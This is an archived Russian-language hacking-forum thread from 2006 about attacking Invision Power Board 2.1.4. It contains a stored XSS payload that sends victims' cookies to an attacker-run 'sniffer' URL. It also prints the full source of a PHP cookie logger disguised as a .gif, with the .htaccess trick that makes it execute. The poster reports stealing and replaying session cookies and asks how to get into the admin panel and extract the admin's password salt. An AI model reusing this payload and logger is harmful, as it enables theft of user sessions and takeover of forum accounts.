ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
25.12.2006, 08:25
|
|
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331
Репутация:
44
|
|
def_ ок понял значь правильно мыслил 
А вторая часть вопроса...
лазил по форуму нашел под версию ipb 2.1.4 эту xss
<script>img = new Image(); img.src = "http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script>
вот немогу понять обычно сниф сам скрипт замаскирован под gif
а вданной xss получается можно даже его изменить на php и тоже полетат куки ?! |
|
|
25.12.2006, 08:26
|
|
Флудер
Регистрация: 27.12.2005
Сообщений: 2,372
Провел на форуме:
5339610
Репутация:
4360
|
|
Короче чувак. Денвер никак донастраивать не надо
|
|
|
|
25.12.2006, 08:30
|
|
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331
Репутация:
44
|
|
чувак смотри видео и лучьше работай не на денвере если у тебя с этим геморой а с настоящем форумом
))
Если ты на щет поставить себе етот форум и опробовать все ето то както непрет хотя c етого и надо было начинать...
|
|
|
|
25.12.2006, 08:35
|
|
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331
Репутация:
44
|
|
_Great_ ну это я понял уже что ненадо ок буду пробовать всем спасибо что не заставили долго ждать с ответами ))) |
|
|
|
25.12.2006, 08:56
|
|
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331
Репутация:
44
|
|
Хмм всеже не догоняю кое что
вот есть сниф состоит он из трех файлов
.htaccess
image.gif -картинка
snif.gif - сам скрип снифа
------------------------------------------
содержание файла .htaccess : и зачем он нужен
Код:
AddType application/x-httpd-php snif.gif
содержание файла snif.gif
Код:
<? // nerezus, 2005, GPL v2 // IF U WANNA USE .png(or .gif, .jpeg) EXT FOR THIS FILE, TYPE AddType application/x-httpd-php .png TO YOUR .htaccess $log="log.txt"; $file = fopen ($log, "a+"); $qu=UrlDecode(getenv('QUERY_STRING')); $ref=UrlDecode(getenv('HTTP_REFERER')); $ip=getenv('REMOTE_ADDR'); $now = getdate(); $nowstring=$now['mday'].".".$now['mon'].".".$now['year']." ".$now['hours'].":".$now['minutes'].":".$now['seconds']; $str="[$nowstring] IP=$ip REFERER=$ref QUERY=$qu\n"; fputs ($file, $str); fclose($file); header('Location: image.gif'); ?>
А в этом скрипте script>http:/сниффер/сниффер.php?"+location.host+document.cookie ;</script> скрип ссылается на сниф с расширением .php
Если я переименую gif на .php буду ли приходить куки
или можно сослаться на gif в данном xss под этот форум ?!
Последний раз редактировалось karabym; 25.12.2006 в 09:08..
|
|
|
|
25.12.2006, 11:04
|
|
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331
Репутация:
44
|
|
Поставил я значь себе этот форум ipb 2.1.4
Кидаю скрип в жалобы
<script>img = new Image(); img.src = "http:/мой_веб/сниффер.php?"+location.host+document.cookie ;</script>
Куки пришли
Но почему потом при замене кукисов в опере для обычного юзера нечего не происходит как был юзером так и остается некакой админки и духу нет ?!
Последний раз редактировалось karabym; 25.12.2006 в 12:21..
|
|
|
|
25.12.2006, 12:29
|
|
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331
Репутация:
44
|
|
А нет вру все проходит на ура
Но как до админки добраться если Админцентр потом требует повторного ввода пароля ?! |
|
|
|
25.12.2006, 14:41
|
|
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331
Репутация:
44
|
|
Почитал тут форум оказывается не так все просто мало иметь хеш админа ещо нужна
соль
Тогда назревает вопрос какие есть sql иньекции для ipb 2.1.4 чтобы пробить соль
вот нарыл иньекцию
SELECT converge_pass_salt FROM ibf_members_converge WHERE converge_id=тут_user_id
А как ее заюзать где ее вставлять тут я профан
Последний раз редактировалось karabym; 25.12.2006 в 14:51..
|
|
|
|
26.12.2006, 10:40
|
|
Новичок
Регистрация: 30.08.2006
Сообщений: 16
Провел на форуме:
72325
Репутация:
18
|
|
это не инъекция, это просто оператор выборки из MySQL, выбирается соль юзера с таким-то ид из таблицы ibf_members_converge. Чтобы это выполнить тебе нужено иметь доступ к базе данных форума.
|
|
|
|
26.12.2006, 16:23
|
|
Постоянный
Регистрация: 14.12.2006
Сообщений: 455
Провел на форуме:
678331
Репутация:
44
|
|
def_ спасиб пролил свет !!!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
